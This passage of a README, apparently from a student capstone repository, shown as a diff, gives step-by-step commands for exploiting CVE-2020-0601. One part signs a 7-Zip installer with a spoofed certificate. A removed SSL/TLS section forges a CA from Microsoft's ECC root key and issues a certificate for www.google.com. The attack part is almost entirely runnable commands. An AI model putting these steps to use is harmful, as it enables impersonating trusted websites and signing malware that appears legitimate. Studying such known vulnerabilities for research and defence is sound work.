yshneyderman/CS590J-Capstone/README.md

 Sign your executable with PKCS12 file.

     osslsigncode sign -pkcs12 cert.p12 -n "Signed by ollypwn" -in 7z1900-x64.exe -out 7z1900-x64_signed.exe

-## SSL/TLS
-*Please use this for educational and researching purposes only.*
-Extract the public key from the CA and modify it according to the vulnerability:

-    ruby main.rb ./MicrosoftECCProductRootCertificateAuthority.cer
-Generate a new x509 certificate based on this key.
-This will be our own spoofed CA.

-    openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt
-Generate a new key.
-This key be of any type you want.
-It will be used to create a SSL certificate, which we will sign with our own CA.

-    openssl ecparam -name secp384r1 -genkey -noout -out cert.key Next up, create a new  certificate signing request (CSR).
-This request will oftenly be sent to trusted CA's, but since we have a spoofed one, we can sign it ourselves.

-If you wish to change the domain name, edit `CN  = www.google.com` to `CN  = www.example.com` inside of `openssl_tls.conf`.

-    openssl req -new -key cert.key -out cert.csr -config openssl_tls.conf -reqexts v3_tls
-Sign your new CSR with our spoofed CA and CA key.
-This certificate will expire in 2047, whereas the real trusted Microsoft CA will expire in 2043.

-    openssl x509 -req -in cert.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl_tls.conf -extensions v3_tls
-You can now use `cert.crt`, `cert.key`, and `spoofed_ca.crt` to serve your content.
-Again, remember to add the spoofed_ca.crt as a certificate chain in your server's HTTPS configuration.

 See the usage example in [https://github.com/IIICTECH/-CVE-2020-0601---ECC-/blob/master/tls/index.js).